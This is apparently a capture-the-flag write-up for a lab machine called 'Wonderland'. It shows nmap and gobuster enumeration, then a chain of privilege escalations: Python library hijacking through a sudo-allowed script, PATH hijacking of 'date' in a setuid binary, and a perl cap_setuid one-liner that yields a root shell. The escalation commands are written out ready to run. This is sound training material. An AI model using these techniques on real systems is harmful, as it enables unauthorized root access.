Wonderland

Fall down the rabbit hole and enter wonderland.

Scanning

Nmap

$ nmap -sV -sC 10.10.59.87       

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST
Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:F4:A0:15:1D:53 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Enumeration

Gobuster

$ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.59.87
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/02 00:03:13 Starting gobuster
===============================================================
/img (Status: 301)
/poem (Status: 301)
/r (Status: 301)
===============================================================
2021/10/02 00:03:14 Finished
===============================================================

/img & /poem nothing interesting no binaries ...

check /r

we will use same command of gobuster and add new directory to the url

in this case we will use alphabet wordlist

$ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt
/a
$ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt
/i
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt
/t
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt
​

the end ... no where to go

openhttp://10.10.59.87/r/a/b/b/i/t on in browser

view source

Initial Access

ssh target using these credentials

Privilege Escalation

Horizontal Escalation to Rabbit

check if alice have any sudo privilege

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice can run this script walrus_and_the_carpenter.py with rabbit privilege

check walrus_and_the_carpenter this code use python library called random

so lets hijack this library

know more about python library hijack article

create fake library with same name 

alice@wonderland:~$ echo "import os
os.system('/bin/bash')" > random.py

run walrus_and_the_carpenter with rabbit privilege

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$

Horizontal Escalation to Hatter

check home directory teaparty here

run it

it seems to trigger $ date command

  • write a command you wanna to execute in file with same name

  • export the path to path_variable

  • run script

rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date 
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ pwd
/home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter

in this directory you can find password.txt

login using ssh as hatter

Vertical Escalate to Root

check capabilities

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

we can cap_setuid+ep Perl

check GTFOBins 

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
PreviousAnonymousNextBlog

Last updated